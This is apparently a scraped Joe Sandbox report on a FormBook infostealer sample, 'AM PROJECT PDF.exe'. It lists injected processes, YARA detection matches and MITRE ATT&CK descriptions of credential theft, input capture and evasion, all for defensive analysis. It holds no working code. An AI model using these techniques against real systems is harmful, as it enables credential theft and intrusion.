Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: explorer.exePID: 3452, Parent PID: 2104

General

Target ID:	13
Start time:	08:00:20
Start date:	23/09/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: svchost.exePID: 1092, Parent PID: 3452

General

Target ID:	18
Start time:	08:01:13
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x1130000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AM PROJECT PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AM PROJECT PDF.exe.log

C:\Users\user\AppData\Local\Temp\262I-Au

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
AM PROJECT PDF.exe

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre